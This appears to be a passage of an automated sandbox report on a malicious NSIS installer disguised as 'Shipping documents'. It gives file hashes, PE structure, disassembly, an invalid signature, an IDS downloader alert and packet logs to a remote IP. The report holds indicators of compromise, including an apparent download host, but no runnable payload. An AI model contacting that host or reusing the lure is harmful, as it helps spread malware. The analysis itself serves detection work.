                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):30558
                                    Entropy (8bit):1.2565581632129332
                                    Encrypted:false
                                    SSDEEP:192:KPshpf6MZR3Bm64GgtH+J5bVD/gv+IhCQaS8HUPLe:KPUf663M64PtH+XbVD/2hhCQaNUPLe
                                    MD5:C82527F49EB89E59FE5958CE1DFC5B6E
                                    SHA1:43C01E5BE8849BA46C914C2C3A8878D1D98B15A9
                                    SHA-256:90FB3C43A3B66B03536AE88D161B53235B2EB4D442434F9D29D9C8E7201BAF5B
                                    SHA-512:E8F633C24C4FA70261166F35231CEF05C8ADD02F2832554196195FABD1DA6FDE2D416A0CBC72AB99C5E1234B5CE36354282B2751ED40E9EF14F4E10C92C912BC
                                    Malicious:false
                                    Preview:..7.............................................................a.....................................+.................R.X..........6j............................................................r.....................................................................................................!..................%....c................z..................K...................................................................................................V.........................^................. ....................t.................x..................................................................................................................'................................a...............l........N.......Y....<..........................................s.............................................................................E..............f...................=..................................................................................................r.................
                                    Process:C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):382625
                                    Entropy (8bit):1.2393915733719494
                                    Encrypted:false
                                    SSDEEP:768:0DJAAEHvN8DLngKAGkZUiUb1jAsxj4xcPZqxc6HygOiI4TFyC3+JU6X2a49ybWb8:iMjZiWvU9QezjY44rg1dW2nU9DMMu
                                    MD5:02908F4CEC5A85D4DEC74585A42043DB
                                    SHA1:C13DE5F26A54B7FAF33BCD7C00D545449B454F1C
                                    SHA-256:EE908BB9AA322F1CCEA9F114EBD9DBEF64F090A58A8C3D87429CF47BDBB10828
                                    SHA-512:91D5A645EF9DB223ADB0D866375F2E3D572574622D396C70B656D9406ECE5651D13BE5696F4686282B79E821D04E59FF301C9C9B2A7FED0402A4DC5B40517BAE
                                    Malicious:false
                                    Preview:.......................................................H........Z..........................................................:....P.......7...........................................k.................................N...t.....................................................................................J........................................................n.................................x...&.................................!.......................r............H...................../....`.........g...................................................................................................................5...q.............r...0........................B..4......................4.....................Id.............5...............................................................................=.............0...............w.R........................Q.............................................................................................8...................................
                                    Process:C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):76421
                                    Entropy (8bit):1.2222919230650398
                                    Encrypted:false
                                    SSDEEP:384:dBg6IMwdyffAJAqH4iCVrQ4WEPPJ4hl7aXOVyyz+o4iBMWMTjV8i/dugYAxzc4bd:tzZo4ZV7WFz3z6iCAyR5g4SA
                                    MD5:5C6BD17741F5F2496614FA289627A551
                                    SHA1:45C09D535F37F35545B9804E4E4ED4D376B8F7C0
                                    SHA-256:AB4D739E02B2053D47C00B10CEC91AE148D1D65E6E2DE11E44FFF98B4E7108E5
                                    SHA-512:1BD44CE6A0DAE092F43B64BDC80DFD82CBA409C377CC48208BBD8946C76588B0A5D9D7E5F8AFF0E8EEB4CA4BA37EF5570A95064C078AE2466B1D9F14A8D9D7D7
                                    Malicious:false
                                    Preview:..........................B......................u................6.......R..........L.....................R....c.....................................................................................................U....................b...........q.......................................................................).........M.............................................6.....................................................................................................................G..........................................................................;.....................h....................................................h........................................................c............................u...............>.................[.....................................................'.........,.......................................................I.'+..................................L...................,.....................o.....?..............................
                                    Process:C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):393334
                                    Entropy (8bit):1.2532534898634065
                                    Encrypted:false
                                    SSDEEP:768:UHwnuiqrFqFhqA6XogdSKbMj1/6faExHnbj/wXdmWpsnXg3xlGpQIrxHCHh1BDxC:f8bUkN0isFeoig2MDY
                                    MD5:F679C6C7F0157B73FA577E78F8C0B147
                                    SHA1:B3AFCE7C58ABC0DA074EB3DF3C1751B30CFB1FC1
                                    SHA-256:A03B4AD55B7CBEF596BABDF0CCCE2618E988D404C80F41BE4B47F476A7D7DDD6
                                    SHA-512:4DE9098C7FEA9BF2A8934D18BE7F2B2E99A08E19C301F50E68ED6B66E64C8CC5FFFD61B3B53601B34A92D46E8EE5917533163695E3C2DC1BBA6DF37DD4DB09BF
                                    Malicious:false
                                    Preview:..........L......%.......Q...................:......................-.........................................?................U......0....D.................................................V..........................`...................................M.................o...............................<....................................................)._....H................T....................................*..........................M.................D........7.............U.............6....................................................................................Z..........................................................................................Q..F............................L.....................n...................X...........................Z...........................<.............U..........................................................................................................g............4..............................................n..............
                                    Process:C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):88304
                                    Entropy (8bit):1.240297499899016
                                    Encrypted:false
                                    SSDEEP:384:Ofcl7NdHEZYLU8+v9H0UrKtGr80B6nusuxr0S+Ix7f1L1+Y8wnKnWHjJvc5M2Er7:Ofui4QasIPc6uMc7z+7wXHFviJazUI
                                    MD5:EA91F0D17239D9E7335361E7814A76F0
                                    SHA1:C8F63FEB9BB27C6523E87C4BCD3285500F4D5988
                                    SHA-256:048A9879E1979B8318C9E11D87485720DE2786F93A13DAED316BCE83F6B1E8ED
                                    SHA-512:076888DACFB76AAC2BF73EA349034C527E5C45147AF5CEBC358CD2D30E4CA313B112B24216B51FDACCC709DD02BEE1A8EF8003AAB8CF773D9174E770E66E490C
                                    Malicious:false
                                    Preview:..............................................................................................................................................{....-.....#.............................Y......................................................s/............!/.C................$..................................................q......*...............................................=...............................o........X..............X....................................................j.....................................................;............................................<...,...........R..................................................$.....................................V............................................................m.......................................".........b....................L.......................................................$.............,............'............._...............................................................................
                                    Process:C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):411
                                    Entropy (8bit):4.289862470065085
                                    Encrypted:false
                                    SSDEEP:12:MnhKnnEOc3JgEVEIz8C79mrEZbzO/QlRcguh+5hS:MhsN+lVzb9m4lznlqh+5hS
                                    MD5:ED70CF38573C4ED87CA2682FA10EC078
                                    SHA1:A91CDA86E2E30183F18C81FC1F4DBCD22E9766A6
                                    SHA-256:64993FDC7B83E3AF82A6D1C7E2D930AB69BFAD07BB9959F480B3E066053282B3
                                    SHA-512:928D5D5E2BB7142F67C097637824CA8B0030BA7E0A238EB80D9B83E4CCE7A255CBFAF7324FBF72FC1446BD43F2C63B109ED43A262E0DA30A96FE7DCE083C6E99
                                    Malicious:false
                                    Preview:withstand tursejlere unindicative nummerering syfilitiker juncaginaceae pastourelle candyflosss..rutherford tossehoveder hamsternes agelaus hoveller,funori shags yurucari akkoladen forkalkende fraveges fodrings sanerer rengringsdamernes kbesummens lurk..grsrytter udsortere remedium unchurn algebraernes.liberalities nonappealability byggegrundenes farde.vadskken easeful opsendelserne corporosity sociopathic..
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Entropy (8bit):6.186153453421366
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Shipping documents 000309498585956000797900.exe
                                    File size:1'081'112 bytes
                                    MD5:94c700b33fb2a1aa2bd02f13750cca75
                                    SHA1:abe3abd4f60778dfa694a8fc54b9d1037a248132
                                    SHA256:9f40759902174555ab1294eb92ae2d17ad2698d2e0e68694edbb9684bdab7692
                                    SHA512:b1962793a313490385ce265763a05585abf1793336ffbbb853fc64b6807e35ec98b28daebe147f98bb901a804ce88bc930c33b7938f31b51b9c9a0c258decc5a
                                    SSDEEP:12288:5faWYFsj2FYoIAyPn4/SLfP2Udh1rtZJi3l/zSL6WKuwpbt+jBL/nepC:ldeXi4/42Up5KV/zSOWlabAjNnKC
                                    TLSH:C63512417A56C8B7E8C319300834CAFB95716CD659E89B1BBF697F4F9C39382CE19248
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.<.L.o.L.o.L.op>.n.L.op>.n.L.op>.n.L.o.L.o.L.oa9.n.L.oa9Vo.L.oa9.n.L.oRich.L.o........PE..L....+.c.................r.........
                                    Icon Hash:933519dbb93f1993
                                    Entrypoint:0x4036fc
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x63132B9B [Sat Sep 3 10:25:31 2022 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:3f91aceea750f765ef2ba5d9988e6a00
                                    Signature Valid:false
                                    Signature Issuer:CN="Nematelminth Superpatriotism Resubmission ", E=Cnidocell170@Dentalhygiejnen.Ov, L=Glengalmadale, S=Scotland, C=GB
                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                    Error Number:-2146762487
                                    Not Before, Not After
                                    • 26/02/2024 02:01:05 25/02/2027 02:01:05
                                    Subject Chain
                                    • CN="Nematelminth Superpatriotism Resubmission ", E=Cnidocell170@Dentalhygiejnen.Ov, L=Glengalmadale, S=Scotland, C=GB
                                    Version:3
                                    Thumbprint MD5:D8D6C2692AECFAD90EA9731D9C6CCEA9
                                    Thumbprint SHA-1:77EE7D4AAAADD9DF76DD881DB4FDFEB132F771E9
                                    Thumbprint SHA-256:894BD449F28ECFD126807ED0DAA4370DC0F6AE0F1F14223DEA83C5B45E16E76A
                                    Serial:558170F9F7BC914C4C2A1F773077F634CD991888
                                    Instruction
                                    sub esp, 000003ECh
                                    push ebx
                                    push ebp
                                    push esi
                                    push edi
                                    xor ebx, ebx
                                    mov edi, 00409528h
                                    push 00008001h
                                    mov dword ptr [esp+14h], ebx
                                    mov ebp, ebx
                                    call dword ptr [00409170h]
                                    mov esi, dword ptr [004090ACh]
                                    lea eax, dword ptr [esp+2Ch]
                                    xorps xmm0, xmm0
                                    mov dword ptr [esp+40h], ebx
                                    push eax
                                    movlpd qword ptr [esp+00000144h], xmm0
                                    mov dword ptr [esp+30h], 0000011Ch
                                    call esi
                                    test eax, eax
                                    jne 00007FD910DB3EF9h
                                    lea eax, dword ptr [esp+2Ch]
                                    mov dword ptr [esp+2Ch], 00000114h
                                    push eax
                                    call esi
                                    push 00000053h
                                    pop eax
                                    mov dl, 04h
                                    mov byte ptr [esp+00000146h], dl
                                    cmp word ptr [esp+40h], ax
                                    jne 00007FD910DB3ED3h
                                    mov eax, dword ptr [esp+5Ah]
                                    add eax, FFFFFFD0h
                                    mov word ptr [esp+00000140h], ax
                                    jmp 00007FD910DB3ECDh
                                    xor eax, eax
                                    jmp 00007FD910DB3EB4h
                                    mov dl, byte ptr [esp+00000146h]
                                    cmp dword ptr [esp+30h], 0Ah
                                    jnc 00007FD910DB3ECDh
                                    movzx eax, word ptr [esp+38h]
                                    mov dword ptr [esp+38h], eax
                                    jmp 00007FD910DB3EC6h
                                    mov eax, dword ptr [esp+38h]
                                    mov dword ptr [00435AF8h], eax
                                    movzx eax, byte ptr [esp+30h]
                                    shl ax, 0008h
                                    movzx ecx, ax
                                    movzx eax, byte ptr [esp+34h]
                                    or ecx, eax
                                    movzx eax, byte ptr [esp+00000140h]
                                    shl ax, 0008h
                                    shl ecx, 10h
                                    movzx eax, word ptr [eax]
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x9b0c0xa0.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x6af88.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x1075180xa00
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x90000x2b0.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x70320x72003668d67c78869a28f70344e1d8e85519False0.6497395833333334data6.41220875237026IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x90000x19a20x1a00fbd4c7eabd4e063addfc684ff44628c8False0.455078125data5.04107190530894IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xb0000x2ab000x200d11ee5d02bcd95455113cdebfc4a87a5False0.30078125data2.035495984906757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .ndata0x360000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x540000x6af880x6b000aa43e7b6e08a642a9aeb746269e47e45False0.1785420925817757data2.026791894263343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x543880x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144EnglishUnited States0.12347619611208095
                                    RT_ICON0x963b00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.1306932450017745
                                    RT_ICON0xa6bd80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.1354057178894261
                                    RT_ICON0xb00800x5d35PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9851221658773731
                                    RT_ICON0xb5db80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.14525271610769958
                                    RT_ICON0xb9fe00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.15612033195020747
                                    RT_ICON0xbc5880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.18761726078799248
                                    RT_ICON0xbd6300x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.20614754098360655
                                    RT_ICON0xbdfb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.24113475177304963
                                    RT_DIALOG0xbe4200x120dataEnglishUnited States0.5138888888888888
                                    RT_DIALOG0xbe5400x11cdataEnglishUnited States0.6056338028169014
                                    RT_DIALOG0xbe6600xc4dataEnglishUnited States0.5918367346938775
                                    RT_DIALOG0xbe7280x60dataEnglishUnited States0.7291666666666666
                                    RT_GROUP_ICON0xbe7880x84dataEnglishUnited States0.7045454545454546
                                    RT_VERSION0xbe8100x348dataEnglishUnited States0.4642857142857143
                                    RT_MANIFEST0xbeb580x42eXML 1.0 document, ASCII text, with very long lines (1070), with no line terminatorsEnglishUnited States0.514018691588785
                                    DLLImport
                                    ADVAPI32.dllRegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
                                    SHELL32.dllShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
                                    ole32.dllOleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
                                    COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                    USER32.dllDispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
                                    GDI32.dllSetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
                                    KERNEL32.dllWriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode
                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-09-27T18:34:24.433199+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.54971484.38.133.14080TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 27, 2024 18:34:23.777945995 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:23.783194065 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:23.783283949 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:23.783452988 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:23.788336992 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.433077097 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.433130026 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.433163881 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.433192968 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.433198929 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.433226109 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.433258057 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.433310032 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.433391094 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.513298035 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.513334990 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.513367891 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.513400078 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.513457060 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.513485909 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.513501883 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.513520002 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.513552904 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.513603926 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.513643980 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.513715982 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.519493103 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.519527912 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.519561052 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.519602060 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.519680023 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.593882084 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.593919992 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.593974113 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.594007015 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.594022989 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.594063044 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.594095945 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.594098091 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.594095945 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.594126940 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.594136000 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.594146013 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.594189882 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.594705105 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.594796896 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.599967957 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.600022078 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.600070953 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.600080013 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.600105047 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.600138903 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.600249052 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.600249052 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.600357056 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.600461006 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.600500107 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.600565910 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.600584030 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.600629091 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.600640059 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.600663900 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.600697994 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.600749016 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.600827932 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.674880981 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.674932957 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.674983978 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.675014973 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.675046921 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.675065994 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.675193071 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.675297976 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.675348043 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.675379038 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.675379992 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.675470114 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.675518990 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.675738096 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.675786972 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.675817013 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.675826073 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.675911903 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.680408955 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.680459976 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.680490017 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.680497885 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.680598974 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.680629969 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.680663109 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.680695057 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.680701971 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.680788994 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.680984020 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.681034088 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.681065083 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.681071043 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.681099892 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.681132078 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.681154013 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.681231976 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.681938887 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.681994915 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.682025909 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.682029009 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.682061911 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.682094097 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.682107925 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.682188988 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.686846018 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.686881065 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.686914921 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.686954975 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.686961889 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.687006950 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.687015057 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.687047958 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.687079906 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.687110901 CEST804971484.38.133.140192.168.2.5
